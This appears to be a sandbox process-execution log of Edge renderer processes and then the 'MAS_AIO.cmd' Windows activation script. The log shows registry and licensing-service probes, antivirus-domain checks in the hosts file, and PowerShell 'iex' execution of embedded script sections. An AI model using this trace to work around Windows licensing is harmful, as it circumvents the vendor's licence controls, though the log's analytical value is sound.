"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5760 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004B4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd"
C:\Windows\System32\sc.exe
sc query Null
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\findstr.exe
findstr /v "$" "MAS_AIO.cmd"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKCU\Console" /v ForceV2
C:\Windows\System32\find.exe
find /i "0x0"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
C:\Windows\System32\find.exe
find /i "ARM64"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
C:\Windows\System32\cmd.exe
cmd
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" "
C:\Windows\System32\find.exe
find /i "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\System32\cmd.exe
cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""
C:\Windows\System32\find.exe
find /i "FullLanguage"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"
C:\Windows\System32\fltMC.exe
fltmc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
C:\Windows\System32\find.exe
find /i "True"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd""" -el -qedit'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" -el -qedit"
C:\Windows\System32\sc.exe
sc query Null
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\findstr.exe
findstr /v "$" "MAS_AIO.cmd"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
C:\Windows\System32\find.exe
find /i "/"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKCU\Console" /v ForceV2
C:\Windows\System32\find.exe
find /i "0x0"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
C:\Windows\System32\find.exe
find /i "ARM64"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
C:\Windows\System32\cmd.exe
cmd
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" "
C:\Windows\System32\find.exe
find /i "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\System32\cmd.exe
cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""
C:\Windows\System32\find.exe
find /i "FullLanguage"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"
C:\Windows\System32\fltMC.exe
fltmc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
C:\Windows\System32\find.exe
find /i "True"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev
C:\Windows\System32\PING.EXE
ping -4 -n 1 updatecheck.massgrave.dev
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "
C:\Windows\System32\find.exe
find "127.69"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "
C:\Windows\System32\find.exe
find "127.69.2.8"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
C:\Windows\System32\find.exe
find /i "/S"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
C:\Windows\System32\find.exe
find /i "/"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
C:\Windows\System32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
C:\Windows\System32\mode.com
mode 76, 33
C:\Windows\System32\choice.exe
choice /C:123456789H0 /N
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKCU\Console" /v ForceV2
C:\Windows\System32\find.exe
find /i "0x0"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
C:\Windows\System32\find.exe
find /i "ARM64"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
C:\Windows\System32\cmd.exe
cmd
C:\Windows\System32\mode.com
mode 76, 25
C:\Windows\System32\choice.exe
choice /C:120 /N
C:\Windows\System32\mode.com
mode 110, 34
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
C:\Windows\System32\find.exe
find /i "AutoPico"
C:\Windows\System32\find.exe
find /i "avira.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "
C:\Windows\System32\findstr.exe
findstr "577 225"
C:\Windows\System32\cmd.exe
cmd /c "wmic path Win32_ComputerSystem get CreationClassName /value"
C:\Windows\System32\find.exe
find /i "computersystem"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get CreationClassName /value
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul
C:\Windows\System32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':winsubstatus\:.*';iex ($f[1])"
C:\Windows\System32\find.exe
find /i "Subscription_is_activated"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 11 Pro" "
C:\Windows\System32\find.exe
find /i "Windows"
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$job = Start-Job { (Get-WmiObject -Query 'SELECT * FROM SoftwareLicensingService').Version }; if (-not (Wait-Job $job -Timeout 30)) {write-host 'sppsvc is not working correctly. Help - https://massgrave.dev/troubleshoot'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get Name /value
C:\Windows\System32\findstr.exe
findstr /i "Windows"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\System32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s
C:\Windows\System32\find.exe
find /i "AutoPico"
C:\Windows\System32\find.exe
find /i "avira.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\find.exe
find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "
C:\Windows\System32\findstr.exe
findstr "577 225"
C:\Windows\System32\sc.exe
sc query Null
C:\Windows\System32\sc.exe
sc start ClipSVC
C:\Windows\System32\sc.exe
sc query ClipSVC
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DependOnService
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Description
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DisplayName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ErrorControl
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ObjectName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Type
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\sc.exe
sc query sppsvc
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DependOnService
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Description
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DisplayName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ErrorControl
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ObjectName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Type
C:\Windows\System32\sc.exe
sc start KeyIso
C:\Windows\System32\sc.exe
sc query KeyIso
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DependOnService
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Description
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DisplayName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ErrorControl
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ObjectName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Type
C:\Windows\System32\sc.exe
sc start Winmgmt
C:\Windows\System32\sc.exe
sc query Winmgmt
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DependOnService
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Description
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DisplayName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ErrorControl
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ObjectName
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start
C:\Windows\System32\reg.exe
reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Type
C:\Windows\System32\sc.exe
sc start ClipSVC
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\sc.exe
sc start KeyIso
C:\Windows\System32\sc.exe
sc start Winmgmt
C:\Windows\System32\sc.exe
sc query ClipSVC
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\sc.exe
sc start ClipSVC
C:\Windows\System32\sc.exe
sc query sppsvc
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\sc.exe
sc start sppsvc
C:\Windows\System32\sc.exe
sc query KeyIso
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\sc.exe
sc start KeyIso
C:\Windows\System32\sc.exe
sc query Winmgmt
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\sc.exe
sc start Winmgmt
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "10" "
C:\Windows\System32\find.exe
find /i "Error Found"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "try { $null=([WMISEARCHER]'SELECT * FROM SoftwareLicensingService').Get().Version; exit 0 } catch { exit $_.Exception.InnerException.HResult }"
C:\Windows\System32\cmd.exe
cmd /c exit /b 0
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get CreationClassName /value
C:\Windows\System32\find.exe
find /i "computersystem"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "0" "
C:\Windows\System32\findstr.exe
findstr /i "0x800410 0x800440 0x80131501"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe\PerfOptions"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State"
C:\Windows\System32\cmd.exe
